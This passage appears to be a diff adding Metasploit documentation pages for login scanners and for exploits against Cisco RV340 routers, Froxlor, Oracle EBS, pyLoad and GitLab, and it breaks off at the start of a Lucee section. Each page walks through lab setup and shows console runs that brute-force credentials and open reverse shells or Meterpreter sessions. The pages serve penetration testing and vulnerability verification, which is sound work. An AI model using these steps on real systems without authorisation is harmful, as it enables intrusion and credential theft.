+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+Note that `VERBOSE` was set to `false` in this scenario to reduce amount of output on screen.
+By default, `VERBOSE` is set to true, which also outputs failed login attempts.
+
+`creds` output:
+
+```
+msf6 auxiliary(scanner/http/softing_sis_login) > creds
+Credentials
+===========
+
+host            origin          service          public  private   realm  private_type  JtR Format
+----            ------          -------          ------  -------   -----  ------------  ----------
+192.168.50.71   192.168.50.71   8099/tcp (http)  admin   P@ssw0rd         Password      
+192.168.50.119  192.168.50.119  8099/tcp (http)  admin   admin            Password      
+192.168.50.206  192.168.50.206  8099/tcp (http)  admin   pass123          Password      
+192.168.50.206  192.168.50.206  8099/tcp (http)  admin1  admin123         Password      
+
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+This module will attempt to authenticate to Wowza Streaming Engine
+via Wowza Streaming Engine Manager web interface.
+
+
+## Installation Steps
+
+Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. On success you should get valid credentials.
+
+## Options
+
+### USERNAME
+
+The username for Wowza Streaming Engine Manager.
+
+### PASSWORD
+
+The password for Wowza Streaming Engine Manager.
+
+### TARGETURI
+
+The path to Wowza Streaming Engine Manager.
+
+
+## Scenarios
+
+
+### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/scanner/http/wowza_streaming_engine_manager_login 
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set rhosts 192.168.200.158
+rhosts => 192.168.200.158
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set username user
+username => user
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set pass_file data/wordlists/unix_passwords.txt
+pass_file => data/wordlists/unix_passwords.txt
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > run
+
+[+] 192.168.200.158:8088 - Found Wowza Streaming Engine Manager
+[-] 192.168.200.158:8088 - Failed: 'user:admin'
+[-] 192.168.200.158:8088 - Failed: 'user:123456'
+[-] 192.168.200.158:8088 - Failed: 'user:12345'
+[-] 192.168.200.158:8088 - Failed: 'user:123456789'
+[+] 192.168.200.158:8088 - Success: 'user:password'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > creds
+Credentials
+===========
+
+host             origin           service          public  private   realm  private_type  JtR Format
+----             ------           -------          ------  -------   -----  ------------  ----------
+192.168.200.158  192.168.200.158  8088/tcp (http)  user    password         Password      
+```
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+This module exploits two vulnerabilities, an authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707),
+to execute code on Cisco RV160, RV260, RV340, and RV345 Small Business Routers prior to 1.0.03.26 as the
+`www-data` user. The command injection occurs in the `upload.cgi` script, where user input in the `data` POST parameter
+is passed to `curl` without any sanitization. Additionally, the `sessionid` session cookie can be abused for a path
+traversal vulnerability, which can be used to bypass authentication by setting `sessionid` to the path to a valid
+file on the target.
+
+This module has been tested against an RV340 device running firmware version 1.0.03.24. 
+Firmware version 1.0.03.26 patches these vulnerabilities.
+
+### Installation
+
+Firmware version 1.0.03.24, which is vulnerable to CVE-2022-20705 and CVE-2022-20707, can be downloaded from
+https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
+
+To install this firmware, follow the following directions:
+1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
+   are `cisco` for the username and password.
+2. The `administration` option on the left side of the web page will take you to a form
+   with a `Manual Upgrade` section.
+3. Leave `File Type: ` on the default `Firmware Image` option.
+4. Change `Upgrade From:` option to `PC`.
+5. Press the `Upgrade` button.
+6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.
+7. Wait for router reboot to complete.
+
+## Verification Steps
+
+1. Install the vulnerable firmware
+2. Start `msfconsole`
+3. Do: `use modules/exploits/linux/http/cisco_rv340_lan`
+4. Do: `set lhost <listening ip>`
+5. Do: `set rhost <target ip>`
+6. Do: `exploit`
+7. Verify: You see the message `Exploit successfully executed` confirming the exploit completed
+8. Verify: You are the `www-data` user using the `id` command
+
+## Options
+
+## Scenarios
+
+### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_netcat payload
+
+```
+msf6 > use modules/exploits/linux/http/cisco_rv340_lan
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
+lhost => 192.168.1.142
+msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf6 exploit(linux/http/cisco_rv340_lan) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.142:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
+[*] Executing Unix Command for cmd/unix/reverse_netcat
+[*] Command shell session 1 opened (192.168.1.142:4444 -> 192.168.1.1:55885) at 2023-02-05 10:06:22 -0500
+[+] Exploit successfully executed.
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_tcp ARMLE Meterpreter payload
+
+```
+msf6 > use modules/exploits/linux/http/cisco_rv340_lan
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
+lhost => 192.168.1.142
+msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf6 exploit(linux/http/cisco_rv340_lan) > set target 1
+target => 1
+msf6 exploit(linux/http/cisco_rv340_lan) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.142:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
+[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.1.142:8080/3b2NfBKR0OS
+[*] Client 192.168.1.1 (Wget) requested /3b2NfBKR0OS
+[*] Sending payload to 192.168.1.1 (Wget)
+[*] Sending stage (934728 bytes) to 192.168.1.1
+[+] Exploit successfully executed.
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Meterpreter session 2 opened (192.168.1.142:4444 -> 192.168.1.1:55950) at 2023-02-05 10:12:37 -0500
+[*] Server stopped.
+
+meterpreter > shell
+Process 11012 created.
+Channel 1 created.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+
+Froxlor is an open source web hosting control panel. Froxlor v2.0.7 and below suffers from a bug that allows
+authenticated users to change the application logs path to any directory on the OS level which the user www-data can
+write without restrictions from the backend which leads to writing a malicious Twig template that the application will
+render. That will lead to achieving a remote command execution under the user www-data.
+
+### Setup
+Install php 8.1 and MySQL. Download the vulnerable Froxlor application and place it in Ubuntu's default webroot. The
+below instruction set should be able to be copy and pasted into a terminal in order to deploy a vulnerable application.
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt install php8.1
+sudo apt install php8.1-common php8.1-mysql php8.1-xml php8.1-xmlrpc php8.1-curl php8.1-gd php8.1-imagick php8.1-cli php8.1-dev php8.1-imap php8.1-mbstring php8.1-opcache php8.1-soap php8.1-zip php8.1-redis php8.1-intl php8.1-gmp php8.1-bcmath -y
+wget https://files.froxlor.org/releases/froxlor-2.0.3.tar.gz
+gunzip froxlor-2.0.3.tar.gz
+tar -xvf froxlor-2.0.3.tar
+sudo rm /var/www/html/index.html
+sudo cp -r froxlor /var/www/html/
+cd /var/www/html/
+sudo chown -R www-data:www-data ./
+sudo apt install mysql-server
+`sudo systemctl start mysql.service`
+sudo mysql
+mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'notpassword';
+mysql> quit;
+sudo systemctl restart apache2
+```
+
+After the above completes successfully, navigate to http://localhost/froxlor to finish the web-based portion of the
+installation. Accept the EULA and input the database credentials and then start the application.
+
+## Options
+
+### TARGETURI
+
+The base URI path of Froxlor. **Default: /froxlor**
+
+### WEB_ROOT
+
+The webroot of the Froxlor server. The webroot must be known in order to write the absolute path of the logfile. The
+default options assumes Froxlor is installed on an Ubuntu machine: **Default: /var/www/html**
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/froxlor_log_path_rce`
+1. Set the `RHOSTS`, `LHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Ubuntu 20.04, Froxlor 2.0.3 running on Apache, MySQL and PHP 8.1
+```
+msf6 > use exploit/linux/http/froxlor_log_path_rce
+[*] Using exploit/linux/http/froxlor_log_path_rce
+msf6 exploit(linux/http/froxlor_log_path_rce) > set rhosts 172.16.199.140
+rhosts => 172.16.199.140
+msf6 exploit(linux/http/froxlor_log_path_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/froxlor_log_path_rce) > set lport 9191
+lport => 9191
+msf6 exploit(linux/http/froxlor_log_path_rce) > set username admin
+username => admin
+msf6 exploit(linux/http/froxlor_log_path_rce) > set password notpassword
+password => notpassword
+msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 172.16.199.1:9191
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Successful login
+[+] The target appears to be vulnerable. Vulnerable version found: 2.0.3
+[+] Successfully Logged in!
+[+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621
+[+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig
+[*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs
+[+] Injected payload sucessfully
+[*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log
+[*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs
+[*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 172.16.199.140
+[*] Cleaning up...
+[*] Deleting tampered footer.html.twig file
+[*] Rewriting clean footer.html.twig file
+[*] Meterpreter session 3 opened (172.16.199.1:9191 -> 172.16.199.140:50398) at 2023-02-13 18:20:02 -0500
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.16.199.140
+OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+This module exploits CVE-2022-21587, an unauthenticated arbitrary file upload vulnerability in Oracle
+Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions
+12.2.3 through to 12.2.11.
+
+The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution
+as the `oracle` user, and will use the `java/jsp_shell_reverse_tcp` payload by default.
+
+The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self
+hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and
+HP-UP. This exploit module has been tested against the Linux based appliance, specifically
+version 12.2.10.
+
+A full technical analysis of the vulnerability can be found on
+[AttackerKB](https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis).
+
+## Target Setup
+
+To setup the Oracle EBS appliance, you must download the appliance files, rebuild the appliance
+image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
+
+* Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery)
+and login to search for the required software. You will need to search for `REL: Oracle VM Virtual Appliance for
+Oracle E-Business Suite` to find the appropriate download links. The version number should be listed at the end of the link.
+
+* You will be presented with multiple ZIP files to download. These files will be extracted and
+concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how
+to do this, as well as additional configuration instructions, can be found in the extracted
+documentation located in `\V1005962-01\Documents\Oracle VM Virtual Appliance for Oracle E-Business
+Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide for installation
+and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
+
+* Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance.
+You will require around 320 GB of hard disk space to complete this operation. Note, issues were encountered
+if the IP address for the appliance changed after the initial install. It is recommended to use either a
+static IP address or ensure your DHCP server provides the same address to the appliance.
+
+* When booting the virtual appliance you will be asked to select a Linux kernel to boot from. The option
+`Oracle Linux Server 7.9, with Linux 3.10.0-1160.11.1.e17.x86_64` was chosen during testing.
+
+* Upon booting the virtual appliance for the first time you will be asked to login. Enter the username `root`
+and follow the instructions displayed in the console to set the default passwords for the `root` and
+`oracle` and `applmgr` user accounts. If asked to install the VISION demo instance, enter `VISION` to install
+the demo data.
+
+* Once installation and setup has been completed, you can SSH into the appliance as the user
+`oracle` and start the database and application services with the following commands. Note, it has been observed that
+when starting the apps, some may timeout when starting (an error will be displayed in the console), and may require
+running `startapps.sh` a second time.
+
+```
+cd /u01/install/APPS/scripts/
+./startdb.sh
+./startapps.sh
+```
+
+* You can now access the WebLogic server over HTTP port `8000`.
+
+## Options
+
+## Verification Steps
+
+From msfconsole perform the following steps:
+
+1. `use exploit/linux/http/oracle_ebs_rce_cve_2022_21587`
+2. Set `RHOST` to the target address and `RPORT` to the target port. The default `RPORT` is 8000 for
+HTTP and 4443 for HTTPS. If using HTTPS set `SSL` to `true`.
+3. Set `LHOST` and `LPORT` values for the default `java/jsp_shell_reverse_tcp` payload.
+4. `check` to ensure the target is vulnerable.
+5. `exploit`
+6. Verify a command session has been opened and you can execute commands as the `oracle` user.
+
+## Scenarios
+
+### Oracle E-Business Suite 12.2.10 - Oracle Virtual Appliance (OVA)
+
+```
+msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > show options
+
+Module options (exploit/linux/http/oracle_ebs_rce_cve_2022_21587):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
+                                       oit/basics/using-metasploit.html
+   RPORT    8000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Oracle EBS on Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set RHOST 192.168.86.37
+RHOST => 192.168.86.37
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
+LHOST => 192.168.86.5
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
+[*] 192.168.86.37:8000 - The target appears to be vulnerable. Oracle EBS version 12.2.10 detected.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.5:4444 
+[*] Targeting the endpoint: /OA_HTML/BneUploaderService
+[*] Triggering the payload...
+[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/ygrne.jsp
+[*] Command shell session 1 opened (192.168.86.5:4444 -> 192.168.86.37:59288) at 2023-02-10 12:20:43 +0000
+
+id
+uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux apps 3.10.0-1160.11.1.el7.x86_64 #1 SMP Tue Dec 15 11:58:45 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.37 - Command shell session 1 closed.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) >
+```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+
+pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport
+functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request
+to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,
+the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on
+port 9666 and can be used remotely without authentication.
+
+## Verification Steps
+
+1. Start a vulnerable instance of pyLoad using docker
+2. Start msfconsole
+3. Run: `use exploit/linux/http/pyload_js2py_exec`
+4. Set the `RHOST`, `PAYLOAD` and payload associated options
+5. Run: `run`
+
+### Docker Setup
+
+```
+docker run -d \
+  --name=pyload-ng \
+  -e PUID=1000 \
+  -e PGID=1000 \
+  -e TZ=Etc/UTC \
+  -p 8000:8000 \
+  -p 9666:9666 \
+  --restart unless-stopped \
+  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
+```
+
+## Options
+
+## Scenarios
+
+### pyLoad 0.5.0b3.dev30 via Docker
+
+```
+msf6 > use exploit/linux/http/pyload_js2py_exec 
+[*] Using configured payload cmd/unix/generic
+msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(linux/http/pyload_js2py_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Successfully tested command injection.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Sending stage (24380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500
+
+meterpreter > getuid
+Server username: abc
+meterpreter > sysinfo
+Computer     : f03ec089a4fe
+OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > pwd
+/config/data
+meterpreter > 
+```
@@ -43,13 +43,13 @@ changed.
 msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
 LHOST => 10.0.0.179

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
 RHOSTS => 10.0.0.219

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

 [*] Started reverse TCP handler on 10.0.0.179:4444 
 [*] Sending stage (24380 bytes) to 10.0.0.219
@@ -65,16 +65,16 @@ Server username: ron
 msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
 LHOST => 10.0.0.179

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
 RHOSTS => 10.0.0.219

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set TARGET 1
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set TARGET 1
 TARGET => 1

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > show options
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > show options

 [...]

@@ -89,7 +89,7 @@ Exploit target:

 View the full module info with the info, or info -d command.

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

 [*] Started reverse TCP handler on 10.0.0.179:4444 
 [*] Sending stage (24380 bytes) to 10.0.0.219
@@ -104,20 +104,20 @@ meterpreter >
 msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
 LHOST => 10.0.0.179

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
 RHOSTS => 10.0.0.219

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RPORT 8000
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RPORT 8000
 RPORT => 8000

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set SSL false
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set SSL false
 [!] Changing the SSL option's value may require changing RPORT!
 SSL => false

-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

 [*] Started reverse TCP handler on 10.0.0.179:4444 
 [*] Sending stage (24380 bytes) to 10.0.0.219
@@ -0,0 +1,201 @@
+## Vulnerable Application
+
+### Description
+
+An authenticated user can import a repository from GitHub into GitLab.
+
+When importing a GitHub repository the GitLab api client uses `Sawyer` for handling the responses. This takes a JSON hash and converts
+it into a Ruby class that has methods matching all of the keys. This happens recursively, and allows for any method to be overridden
+including built-in methods such as `to_s`.
+
+The redis gem uses `to_s` and `bytesize` to generate the RESP (Redis serialization protocol) command. By replying with a specially
+crafted JSON object (that will be further parsed as a `Sawyer::Resource`), one controlling the GitHub server can inject arbitrary
+redis commands to the stream.
+
+On August 30, 2022, GitLab released a software update that addressed this vulnerability (CVE-2022-2992).
+
+The following products are affected:
+
+- From 11.10 to 15.1.6
+- From 15.2 to 15.2.4
+- From 15.3 to 15.3.2
+
+
+### Exploitation
+
+This module exploits the GitLab vulnerability by injecting a Ruby serialized object into the Redis user
+session object. Once GitLab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
+execute a deserialization gadget and trigger the payload.
+
+To achieve that this module:
+- Will generate an universal Ruby deserialization gadget payload;
+- Will create an access token for the user targeted;
+- Will start a server to emulate GitHub and serve the payload to be injected;
+- Will create a group and also trigger the GitHub import feature to the repository from the controlled server
+- Will perform a request using the just injected session ID that when loaded must trigger the payload.
+
+After the execution the cleanup method will be called and:
+- Should delete the created group and consequently the repository
+- Should revoke the access token created
+- Should logout the user
+
+### Setup
+
+Create a `docker-compose.yml` file as below:
+
+```yml
+services:
+  gitlab:
+    image: 'gitlab/gitlab-ee:15.3.1-ee.0'
+    restart: always
+    container_name: gitlab
+    hostname: 'gitlab.example'
+    network_mode: "bridge"
+    ports:
+      - '880:80'
+      - '8443:443'
+    volumes:
+      - gitlab_config:/etc/gitlab
+      - gitlab_logs:/var/log/gitlab
+      - gitlab_data:/var/opt/gitlab
+volumes:
+  gitlab_config:
+    driver: local
+  gitlab_logs:
+    driver: local
+  gitlab_data:
+    driver: local
+```
+
+Run the below command to create the container:
+
+```
+$ docker-compose up
+```
+
+Wait for container to be "healthy" before continue. One can use [this](https://github.com/redwaysecurity/CVEs/blob/main/CVE-2022-2992/environment/healthy.sh) bash script to monitor the status.
+
+```
+$ # Creating personal access token for the root user
+$ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
+$ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
+$ # Using the personal access token from the root user a user.
+$ USER=msf
+$ PASSWORD=SuperStrongestGitLabPassword
+$ curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&email=$USER@gitlab.example&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"
+```
+
+## Verification Steps
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### TARGETURI (required)
+
+The path to the GitLab (Default: `/`).
+
+### USERNAME (required)
+
+The username of the target user to authenticate with.
+
+### PASSWORD (required)
+
+The password of the target user to authenticate with.
+
+### SRVHOST (required)
+
+The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+
+### SRVPORT (required)
+
+The local port to listen on. This is the port to be used when creating the tunnel.
+
+### URIHOST
+
+Host to use in GitHub import URL. On default GitLab instances, this must be either a public (non-RFC1918) IP address or
+a hostname that resolves to a public IP address. This option can be used in conjunction with a reverse port-forwarding
+service such as SSH or NGROK. **The target GitLab server will connect to this host and eventually receive the payload
+through it, so it is important to use a host that is considered to be trustworthy.**
+
+## Scenarios
+
+### Docker container running GitLab 15.3.1
+
+The following example uses the following three hosts:
+
+* 192.168.159.128 -- The target GitLab server
+* 192.168.250.134 -- The host on which Metasploit is running
+* ext.msflab.local -- An external host on the internet through which the HTTP requests from GitLab to Metasploit are
+  tunneled in order to bypass GitLab restrictions.
+
+External to Metasploit, SSH is used to setup a reverse port forward through a host with a public (non-RFC1918) IP
+address. This is necessary to bypass Import URL restrictions that are in place by default on GitLab. The port-forward
+was configured with `ssh -R 8088:localhost:8088 ext.msflab.local` to forward TCP port 8088 on ext.msflab.local to the
+local Metasploit instance. Alternatively, this step could be skipped if Metasploit were running on a host with public IP
+address.
+
+If the target GitLab server can not import from the specified URL (for example because the host is a private IP
+address), then the module will throw this error:
+
+```
+[-] Exploit failed: Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError Invalid URL: http://192.168.250.134:8088/
+```
+
+```
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options
+
+Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):
+
+   Name          Current Setting          Required  Description
+   ----          ---------------          --------  -----------
+   IMPORT_DELAY  5                        yes       Time to wait from the import task before try to trigger the payload
+   PASSWORD      Password1!               yes       The password for the specified username
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.128          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         880                      yes       The target port (TCP)
+   SRVHOST       0.0.0.0                  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8088                     yes       The local port to listen on.
+   SSL           false                    no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                        yes       The base path to the gitlab application
+   URIHOST       ext.msflab.local         no        Host to use in GitHub import URL
+   URIPATH                                no        The URI to use for this exploit (default is random)
+   USERNAME      smcintyre                yes       The username to authenticate as
+   VHOST                                  no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected GitLab version 15.3.1 which is vulnerable.
+[*] Using URL: http://ext.msflab.local:8088/
+[*] Command shell session 1 opened (192.168.250.134:4444 -> 192.168.250.134:56794) at 2023-02-13 13:41:05 -0500
+id
+[*] Server stopped.
+
+uid=998(git) gid=998(git) groups=998(git)
+pwd
+/var/opt/gitlab/gitlab-rails/working
+exit
+[*] 192.168.159.128 - Command shell session 1 closed.
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
+```
@@ -0,0 +1,221 @@
+# Vulnerable Application
+Lucee is an Open Source ColdFusion server/engine intended for rapid web development. Many implementations of
+ColdFusion files support dynamic input and server side code execution.
+In the case of this module, Lucees implementation supports the use of `cfexecute` and `cfscript` tags in `.cfm` files.
+
+In addition to these features, Lucee provides a scheduled job feature. This feature will accept an
+external `url` argument and query that page on execution. If logging is enabled, it is possible to
